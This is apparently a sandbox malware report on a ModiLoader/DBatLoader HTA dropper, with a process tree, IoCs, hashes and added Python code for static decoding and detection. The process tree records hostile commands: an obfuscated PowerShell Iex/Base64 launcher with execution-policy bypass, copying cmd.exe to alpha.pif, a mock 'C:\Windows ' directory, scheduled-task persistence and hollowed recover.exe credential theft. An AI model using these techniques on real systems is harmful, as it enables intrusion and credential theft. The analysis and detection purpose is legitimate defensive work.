Analysis
max time kernel: 148s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/04/2025, 15:19
Static task: static1
Behavioral task: behavioral1
Sample: creatingbestthingsforbetterfuture.hta
Resource: win10v2004-20250314-en
General
Target: creatingbestthingsforbetterfuture.hta
Size: 13KB
MD5: d784a93b62ff236f0090d49eee225f61
SHA1: 18545dbd755b169d693a42c7e0ab32f4fd81aeaf
SHA256: 5774db473258bf744264a3a02e01931fa02ecd19a26f0f9329bfa5ac89d08512
SHA512: 3ca6164390caddbfe14bb3b50e690c08bd5e4df827b4a24e642b759c63cb375cf54ed9f3c9e9bd76c13075f149637034cee64039c9230bc100ba3016c42e73f0
SSDEEP: 48:3StrVotriVRy1K+rUmn514Szy6oFAConovTboMrt2tgVJtSPG:AgrYmN514SyJF1onovTbDEGS+
Malware Config
Signatures
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Modiloader family

ModiLoader Second Stage 61 IoCs
yara_rule: modiloader_stage2
resource: behavioral1/memory/5412-<N>-0x0000000002910000-0x0000000003910000-memory.dmp
All 61 hits are on the same 16 MB region (0x02910000-0x03910000) of PID 5412, the dropped sihost.exe, matched in memory dumps N = 79, 82-140 and 142; the region stays resident and unchanged for the rest of the run, which is what makes it a reliable memory scan target.
Blocklisted process makes network request 1 IoCs
flow 23, pid 5912, powershell.exe

Downloads MZ/PE file 1 IoCs
flow 23, pid 5912, powershell.exe

Evasion via Device Credential Deployment 2 IoCs
pid 5472 cmd.exe
pid 5912 powershell.exe
Both hits are the same DeviceCredentialDeployment token in the PowerShell command line that cmd.exe passes through; see the process tree.

Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation
  by rundll32.exe
  by mshta.exe
  by rundll32.exe

Executes dropped EXE 5 IoCs
pid 5412 sihost.exe
pid 4172 alpha.pif
pid 5788 alpha.pif
pid 4040 Djauszke.PIF
pid 1884 Djauszke.PIF

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Key opened: \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
  by recover.exe

Suspicious use of SetThreadContext 3 IoCs
PID 5412 sihost.exe set thread context of 4060 (procid_target 121)
PID 5412 sihost.exe set thread context of 4412 (procid_target 122)
PID 5412 sihost.exe set thread context of 3324 (procid_target 123)
The three targets are the recover.exe instances in the process tree; together with the four WriteProcessMemory calls sihost.exe makes into each of them (below) and the MapViewOfSection hits, this is the process-hollowing pattern: the legitimate recover.exe is started suspended, its image replaced, and its thread context pointed at the injected code.

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 2 IoCs
pid 5328 WerFault.exe, pid_target 4040 (procid_target 116)
pid 4704 WerFault.exe, pid_target 1884 (procid_target 133)

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  by cmd.exe (4 times), recover.exe (3), alpha.pif (2), Djauszke.PIF (2), powershell.exe, PING.EXE, csc.exe, schtasks.exe, cvtres.exe, mshta.exe, sihost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid 5920 PING.EXE

Runs ping.exe 1 TTPs 1 IoCs
pid 5920 PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid 464 schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs
pid 5912 powershell.exe (2 times), pid 4060 recover.exe (4), pid 3324 recover.exe (2)

Suspicious behavior: MapViewOfSection 3 IoCs
pid 5412 sihost.exe (3 times)

Suspicious use of AdjustPrivilegeToken 2 IoCs
Token: SeDebugPrivilege, pid 5912 powershell.exe
Token: SeDebugPrivilege, pid 3324 recover.exe

Suspicious use of SetWindowsHookEx 1 IoCs
pid 5412 sihost.exe

Suspicious use of WriteProcessMemory 57 IoCs
One line per parent -> child pair; procid_target is the sandbox's internal index of the child process, not its PID. Three writes per child is the normal CreateProcess pattern; the four-write entries are the hollowed recover.exe targets.
PID 1184 mshta.exe -> 5472 (procid_target 87): 3 writes
PID 5472 cmd.exe -> 5912 (90): 3 writes
PID 5912 powershell.exe -> 4904 (96): 3 writes
PID 4904 csc.exe -> 4308 (97): 3 writes
PID 5912 powershell.exe -> 5412 (101): 3 writes
PID 5412 sihost.exe -> 5200 (102): 3 writes
PID 5412 sihost.exe -> 3452 (103): 3 writes
PID 5200 cmd.exe -> 4256 (106): 3 writes
PID 3452 cmd.exe -> 5920 (107): 3 writes
PID 5200 cmd.exe -> 4172 (108): 3 writes
PID 5200 cmd.exe -> 5788 (109): 3 writes
PID 5412 sihost.exe -> 4336 (110): 3 writes
PID 4336 cmd.exe -> 464 (113): 3 writes
PID 1292 rundll32.exe -> 4040 (116): 3 writes
PID 5412 sihost.exe -> 4060 (121): 4 writes
PID 5412 sihost.exe -> 4412 (122): 4 writes
PID 5412 sihost.exe -> 3324 (123): 4 writes
PID 5980 rundll32.exe -> 1884 (133): 3 writes
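The "Evasion via Device Credential Deployment", "Blocklisted process makes network request" and "Downloads MZ/PE file" hits all belong to one PowerShell process (PID 5912). Its command line, recorded in full in the process tree below, calls DeviceCredentialDeployment (used to hide the console window) and then runs a nested Iex($(iEX(...))) wrapper that assembles [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) out of single-quoted fragments and [CHAR] casts. The following Python is an added example for this report, not part of the sandbox output or of the malware: it folds the fragments and decodes the Base64 layer statically, without executing any PowerShell. The page redacts the real Base64 blob, so CONSTRUCTED_STAGE2 is a stand-in and the decoded result is only that stand-in, not the actual second stage.

```python
"""Static unwrapping of the obfuscated PowerShell launcher (PID 5912).

Added example for this report, not part of the sandbox output or of the
malware. Nothing is executed as PowerShell: the [CHAR] casts and the '+'
string chain are folded textually, then the Base64 layer is decoded.
The report redacts the real Base64 blob, so CONSTRUCTED_STAGE2 stands in.
"""
import base64
import re

# Constructed stand-in for the redacted payload; the real one is unknown here.
CONSTRUCTED_STAGE2 = "Write-Host 'constructed stand-in for the removed second stage'"
CONSTRUCTED_B64 = base64.b64encode(CONSTRUCTED_STAGE2.encode()).decode()

# Command line as recorded in the process tree, with the blob replaced by the stand-in.
CMDLINE = (
    "poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; "
    "Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+"
    "'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+"
    "'frOMBaSE64STRiNg('+[CHAr]0X22+'" + CONSTRUCTED_B64 + "'+[ChAR]34+'))')))"
)

# A single-quoted literal, or a [char]N cast (decimal or 0x hex), in source order.
FRAGMENT = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
B64_CALL = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)
ENCODING = re.compile(r"encoding\]\s*::\s*(utf8|unicode|ascii)\.getstring", re.IGNORECASE)
CODECS = {"utf8": "utf-8", "unicode": "utf-16-le", "ascii": "ascii"}


def fold_fragments(expr: str) -> str:
    """Concatenate every literal and [CHAR] cast exactly as the '+' chain would."""
    parts = []
    for m in FRAGMENT.finditer(expr):
        parts.append(m.group(1) if m.group(1) is not None else chr(int(m.group(2), 0)))
    return "".join(parts)


def decode_stage(folded: str) -> str:
    """Decode the FromBase64String(...) argument using the text encoding named around it."""
    call = B64_CALL.search(folded)
    if call is None:
        raise ValueError("no FromBase64String(...) call in folded expression")
    enc = ENCODING.search(folded)
    codec = CODECS[enc.group(1).lower()] if enc else "utf-8"
    return base64.b64decode(call.group(1), validate=True).decode(codec)


def parse_launcher(cmdline: str) -> dict:
    """Summarise the host switches, then peel the Iex(...) layers down to the next stage."""
    low = cmdline.lower()
    policy = re.search(r"-ex\w*\s+(\S+)", low)          # -ex is a prefix of -ExecutionPolicy
    return {
        "exec_policy": policy.group(1) if policy else None,
        "noninteractive": re.search(r"-noni\w*", low) is not None,
        "hidden_window": re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", low) is not None,
        "device_credential_deployment": "devicecredentialdeployment" in low,
        "iex_layers": len(re.findall(r"\b(?:iex|invoke-expression)\b", low)),
        "stage2": decode_stage(fold_fragments(cmdline)),
    }


if __name__ == "__main__":
    for key, value in parse_launcher(CMDLINE).items():
        print(f"{key}: {value}")
```

On a real command line the returned stage2 is the next script to analyse, which is where the network request and PE download attributed to PID 5912 would originate; the folding step is deliberately a textual concatenation rather than an evaluation so that nothing in the sample is ever run.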
Processes
(Indentation shows parent/child depth; "command" is the command line as recorded by the sandbox, followed by the signatures that fired on that process.)

C:\Windows\SysWOW64\mshta.exe (depth 1, PID 1184)
  command: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingbestthingsforbetterfuture.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (depth 2, PID 5472)
    command: "C:\Windows\system32\cmd.exe" "/C poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'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'+[ChAR]34+'))')))"
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 5912)
      command: poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'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'+[ChAR]34+'))')))"
      - Blocklisted process makes network request
      - Downloads MZ/PE file
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (depth 4, PID 4904)
        command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.cmdline"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (depth 5, PID 4308)
          command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES70BB.tmp" "c:\Users\Admin\AppData\Local\Temp\aw5cq0fe\CSCAEF37203D2584819B593FBAC3246696.TMP"
          - System Location Discovery: System Language Discovery

      C:\Users\Admin\AppData\Roaming\sihost.exe (depth 4, PID 5412)
        command: "C:\Users\Admin\AppData\Roaming\sihost.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe (depth 5, PID 5200)
          command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\1859.cmd
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\esentutl.exe (depth 6, PID 4256)
            command: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o

          C:\Users\Public\alpha.pif (depth 6, PID 4172)
            command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery

          C:\Users\Public\alpha.pif (depth 6, PID 5788)
            command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery

        C:\Windows\SysWOW64\cmd.exe (depth 5, PID 3452)
          command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\39457.cmd
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\PING.EXE (depth 6, PID 5920)
            command: ping 127.0.0.1 -n 10
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

        C:\Windows\SysWOW64\cmd.exe (depth 5, PID 4336)
          command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\81.cmd
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\schtasks.exe (depth 6, PID 464)
            command: schtasks /create /sc minute /mo 1 /tn "Djauszke" /tr C:\\ProgramData\\Djauszke.url"
            - System Location Discovery: System Language Discovery
            - Scheduled Task/Job: Scheduled Task

        C:\Windows\SysWOW64\recover.exe (depth 5, PID 4060)
          command: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\iskdvgtuccshfbzowzmcgqormolsaptsve"
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses

        C:\Windows\SysWOW64\recover.exe (depth 5, PID 4412)
          command: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\smqwwz"
          - Accesses Microsoft Outlook accounts
          - System Location Discovery: System Language Discovery

        C:\Windows\SysWOW64\recover.exe (depth 5, PID 3324)
          command: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\uovgxropdt"
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\rundll32.exe (depth 1, PID 1292)
  command: C:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\Links\Djauszke.PIF (depth 2, PID 4040)
    command: "C:\Users\Admin\Links\Djauszke.PIF"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\WerFault.exe (depth 3, PID 5328)
      command: C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1276
      - Program crash

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 5072)
  command: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4040 -ip 4040

C:\Windows\System32\rundll32.exe (depth 1, PID 5980)
  command: C:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\Links\Djauszke.PIF (depth 2, PID 1884)
    command: "C:\Users\Admin\Links\Djauszke.PIF"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\WerFault.exe (depth 3, PID 4704)
      command: C:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 1112
      - Program crash

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 1284)
  command: C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1884 -ip 1884
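Read top to bottom, the tree above is the whole DBatLoader/ModiLoader hand-off: mshta.exe runs the .hta; cmd.exe starts a hidden PowerShell that compiles a helper through csc.exe (the runtime compile Add-Type performs) and launches sihost.exe, a Windows process name but living under AppData\Roaming; that loader copies cmd.exe to alpha.pif with esentutl, creates the mock trusted directory "C:\Windows " (note the trailing space, which is why the \\?\ prefix is needed), pauses with ping, registers a once-a-minute scheduled task whose action is a .url file (each trigger appears as a separate rundll32 ieframe.dll,OpenURL root launching Djauszke.PIF, which crashes both times), and hollows three recover.exe instances that run with /stext, an argument the real recover.exe does not take. The Python below is an added example for this report (not the sandbox's own logic) that turns each of those steps into a detection predicate and runs it over process-creation events transcribed from the tree; the two long PowerShell command lines are abbreviated to Iex(...), and the parents of the root processes, which the page does not record, are set to 0.

```python
"""Detection predicates for the loader chain shown in this report.

Added example, not part of the sandbox output. EVENTS is transcribed from
the process tree (pid, ppid, image, command line); the two PowerShell
command lines are abbreviated to "Iex(...)". In production the same
predicates run over Sysmon event 1 or Security 4688 records.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# ppid 0: the parent is not recorded on the page.
EVENTS = [
    Event(1184, 0, r"C:\Windows\SysWOW64\mshta.exe", r'mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingbestthingsforbetterfuture.hta"'),
    Event(5472, 1184, r"C:\Windows\SysWOW64\cmd.exe", r'cmd.exe "/C poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex(...)"'),
    Event(5912, 5472, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r"poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex(...)"),
    Event(4904, 5912, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", r'csc.exe /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.cmdline"'),
    Event(5412, 5912, r"C:\Users\Admin\AppData\Roaming\sihost.exe", r'"C:\Users\Admin\AppData\Roaming\sihost.exe"'),
    Event(5200, 5412, r"C:\Windows\SysWOW64\cmd.exe", r"cmd.exe /c C:\\ProgramData\\1859.cmd"),
    Event(4256, 5200, r"C:\Windows\SysWOW64\esentutl.exe", r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"),
    Event(4172, 5200, r"C:\Users\Public\alpha.pif", r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "'),
    Event(5788, 5200, r"C:\Users\Public\alpha.pif", r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'),
    Event(3452, 5412, r"C:\Windows\SysWOW64\cmd.exe", r"cmd.exe /c C:\\ProgramData\\39457.cmd"),
    Event(5920, 3452, r"C:\Windows\SysWOW64\PING.EXE", r"ping 127.0.0.1 -n 10"),
    Event(4336, 5412, r"C:\Windows\SysWOW64\cmd.exe", r"cmd.exe /c C:\\ProgramData\\81.cmd"),
    Event(464, 4336, r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /create /sc minute /mo 1 /tn "Djauszke" /tr C:\\ProgramData\\Djauszke.url'),
    Event(4060, 5412, r"C:\Windows\SysWOW64\recover.exe", r'recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\iskdvgtuccshfbzowzmcgqormolsaptsve"'),
    Event(4412, 5412, r"C:\Windows\SysWOW64\recover.exe", r'recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\smqwwz"'),
    Event(3324, 5412, r"C:\Windows\SysWOW64\recover.exe", r'recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\uovgxropdt"'),
    Event(1292, 0, r"C:\Windows\System32\rundll32.exe", r'rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url'),
    Event(4040, 1292, r"C:\Users\Admin\Links\Djauszke.PIF", r'"C:\Users\Admin\Links\Djauszke.PIF"'),
    Event(5980, 0, r"C:\Windows\System32\rundll32.exe", r'rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url'),
    Event(1884, 5980, r"C:\Users\Admin\Links\Djauszke.PIF", r'"C:\Users\Admin\Links\Djauszke.PIF"'),
]

# Image names droppers like to borrow; genuine copies live under C:\Windows\.
SYSTEM_NAMES = {"sihost.exe", "svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe", "dllhost.exe"}


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rx(pattern: str):
    """Predicate that tests a regex against the command line only."""
    compiled = re.compile(pattern, re.IGNORECASE)
    return lambda e, parent: compiled.search(e.cmdline) is not None


# name -> predicate(event, parent_event_or_None)
RULES = {
    "mshta_spawns_shell": lambda e, p: p is not None and base(p.image) == "mshta.exe" and base(e.image) in {"cmd.exe", "powershell.exe"},
    "device_credential_deployment": rx(r"devicecredentialdeployment"),
    "csc_from_powershell": lambda e, p: base(e.image) == "csc.exe" and p is not None and base(p.image) == "powershell.exe",
    "masquerade_system_name": lambda e, p: base(e.image) in SYSTEM_NAMES and not e.image.lower().startswith("c:\\windows\\"),
    "esentutl_copy": rx(r"esentutl(?:\.exe)?\b.*\s/y\s.*\s/d\s"),        # /y source /d destination
    "mock_trusted_dir": rx(r'\\\\\?\\[^"]*?\S (?:\\|")'),                  # \\?\...\Name<space>\ or "
    "pif_from_user_path": lambda e, p: base(e.image).endswith(".pif") and e.image.lower().startswith("c:\\users\\"),
    "ping_sleep": rx(r"\bping\s+(?:127\.0\.0\.1|localhost)\s+-n\s+\d+"),
    "schtasks_url_trigger": rx(r'schtasks.*\s/create\s.*\s/tr\s+"?[^"\s]+\.url\b'),
    "rundll32_openurl": rx(r'ieframe\.dll"?\s*,\s*openurl'),
    # The real recover.exe takes a file path, never /stext; with SetThreadContext from
    # sihost.exe these are hollowed hosts, not the Windows tool.
    "recover_stext": lambda e, p: base(e.image) == "recover.exe" and "/stext" in e.cmdline.lower(),
}


def run_rules(events=EVENTS) -> dict:
    """Return {rule name: sorted PIDs it fired on}."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        parent = by_pid.get(e.ppid)
        for name, pred in RULES.items():
            if pred(e, parent):
                hits.setdefault(name, []).append(e.pid)
    return {name: sorted(pids) for name, pids in hits.items()}


def lineage(pid: int, events=EVENTS) -> list:
    """Image basenames from the outermost recorded ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for name, pids in run_rules().items():
        print(f"{name:30} {pids}")
    print(" -> ".join(lineage(4256)))
```

The device_credential_deployment rule fires on exactly the two PIDs the sandbox lists for "Evasion via Device Credential Deployment", and recover_stext on the three SetThreadContext targets, so the predicates can be checked against the report's own counts before they are deployed. Any single rule here is noisy on its own (ping -n delays and csc.exe under PowerShell are common in admin scripting); the value is in the lineage: a chain that starts at mshta.exe and reaches esentutl or a .pif under C:\Users has no benign explanation.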
Network
MITRE ATT&CK Enterprise v15
Downloads
(Files written or fetched during the run, listed by size and hash.)

Filesize: 19KB
  MD5: 1df650cca01129127d30063634ab5c03
  SHA1: bc7172dec0b12b05f2247bd5e17751eb33474d4e
  SHA256: edd4094e7a82a6ff8be65d6b075e9513bd15a6b74f8032b5c10ce18f7191fa60
  SHA512: 0bddf9ecaaedb0c30103a1fbfb644d6d4f7608bd596403307ed89b2390568c3a29e2cf55d10e2eadbfc407ede52eaf9a4f2321ba5f37e358a1039f73c7688fbd

Filesize: 2KB
  MD5: 9a020804eba1ffac2928d7c795144bbf
  SHA1: 61fdc4135afdc99e106912aeafeac9c8a967becc
  SHA256: a86c6c7a2bf9e12c45275a5e7ebebd5e6d2ba302fe0a12600b7c9fdf283d9e63
  SHA512: 42f6d754f1bdbeb6e4cc7aeb57ff4c4d126944f950d260a0839911e576ad16002c16122f81c1d39fa529432dca0a48c9acfbb18804ca9044425c8e424a5518be

Filesize: 83B
  MD5: 40dcdc4a568ca38fd76ed517d58895dd
  SHA1: a61427cc65116b4f452c75d8270d5316aa52087f
  SHA256: 5337e647cbe97c1108b0c690bccf5327291051fd0b80a7c51a8f06ca4c32b987
  SHA512: 2e32e0bec4ec95af7f1d5fa7a26e69d00a0d50afedeefeb50a809eb52a44d9c00036ccaaf47773035e21925fcc0425a3726d5676013189d0845a31c93dfa0cb1

Filesize: 99B
  MD5: a5912988334a6c35fe2ec953f58ce524
  SHA1: 6948136050973d827eed0327e58fc134d669a081
  SHA256: fe37e36e0ead8740d562edcab4c2157d530feb3bc736743421d77706552fdf0f
  SHA512: b569029ae32c7276d4a8e6ca055c40132858ddd5607f3d61fd695253d93a6fb13275f9308a24e9c9dbf09ad2ea386e426089f36e0127b21fd9c6b14a7825d480

Filesize: 102B
  MD5: 5dc76b14f6c80491954c744e47119360
  SHA1: 9fd1e95bc06a9f19a1ad9fcb5f8fa272c8013e66
  SHA256: 58397582ee17680b2f4d10f5c8245c8e36f99deb0a11c17b1359d02093cc7550
  SHA512: 10d27351c6cb77ec93f96ecaeadfea2b3341cfdc5e6904a5e86e69f2d1dbb9753ba994e5dfab0001b2de396e44e27961b698c43306f01ad5fc8fe67463467f5f

Filesize: 1KB
  MD5: 07e3511f495b713d432dd83ff5967816
  SHA1: 5c24755ed85cc5ce62802eaa39aa719d79d4c05a
  SHA256: 5ca722b31603f9d7ead841cee06339f4678274d04c8c548a81e234cfc33f6226
  SHA512: 3b0c16bdef3bbfb5fe05ab10683dded6b60fbc9d5569ca4e5e07102fb2ffc17a36b1d229eee306e5b3a58d5c98526987a8bef992f8a708744cee0b6ae2b2b245

Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 3KB
  MD5: 2e408cb2400e4e64fc86bed25443526d
  SHA1: 0330d029475c8e34c9b21fa9cf0be42c92a3deeb
  SHA256: 7270089019a3e2b8ca6bd5cc73908ed5d7e542eab4feb35e1a6a82aa27d5e7a7
  SHA512: 5e2c770a8d48c94424b90c5fca97828c2da6430f7397399e2c09a1bc380d94e2eeeb7007de658448cb442801e2a191192ad467f19090107194c82c039817a6b1

Filesize: 4KB
  MD5: 05a640e15ef8a6cd5d8db4633bfd2df3
  SHA1: 23771918cb286dd2ca98c0cc1664931e64cc33c8
  SHA256: 5b8be3e1fe8438ab1032b5914b5f5b8f544defc91213c6ef3f307b44d2a1951c
  SHA512: 27d198ecea0bbc12a48ce27c8dbd8a9a445248956623cefd501562cf00162a662e40f020a7276f1f870f324617f419342de9384b71664eea4778866b8bcfd616

Filesize: 1.6MB
  MD5: d245c0efade78fbe55c9d537732dc8fb
  SHA1: 339657894338cfa9ee994e440443d4fc7ef75368
  SHA256: 860bb4fd3607ebdb177d9732653f9baeff86192cdf7874c5824ab37b9b61013d
  SHA512: 562e31c22abf83d57785a5506025847e18a652765f4086ebc1c199b751eeb184a85e9d0ec08289fea1b6beeda0b94e2195a46702aa643ba4f3558a4023af2268

Filesize: 231KB
  MD5: d0fce3afa6aa1d58ce9fa336cc2b675b
  SHA1: 4048488de6ba4bfef9edf103755519f1f762668f
  SHA256: 4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
  SHA512: 80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

Filesize: 652B
  MD5: e31bf71a9f8e2ebc642e48659d359363
  SHA1: ab20c35c04ec6993497f28bd882ac0fb0fb63697
  SHA256: a9fd29c1c84662d1d7c5d7b11757d14ec8429d0d455687b43a8889d7de1d4857
  SHA512: 3eac3fcd4293c7bd7d7277b146ee1be2f8c2390fd2491ff31e81469a08079c8a96311e4f4cb962dc9fe980b525ff5b8e37c9e68fd43a6720c0423f37c8936261

Filesize: 485B
  MD5: 74f03e78d7b73ad6aa4709e6695db6c2
  SHA1: 14fc151424d082da9dc8c6310d08ff28b6657686
  SHA256: 53b979b096d502e2525526211f57212442a0a9bdfd49e14b695541cdfe37d969
  SHA512: 9b58cdd28852e1bb63d88cb84473175e4e94f81525b3135e0d063d730b8c6c5561f1d1d9b36d2dde8197dbfa185e75bf57d9d95abd39d5e48cceb2e0e2d88e55

Filesize: 369B
  MD5: 5a78c5541c2ff3d21cf4aec0eef1a6a6
  SHA1: 4381468fc74a64a7817c136d99aef6cc66612614
  SHA256: 03c7dd657859e3a6e64efbb068a7099650da098bd1cdfd92027d2c2526fc740e
  SHA512: e8283982039f76771ecb03d090a3a7a28ba10e86ff356e0a7e3436fcf5f89dc771ad9264a6e78e90b64e1ffcbd8e98fb32636b5a188f74bc15883e34c7b475d7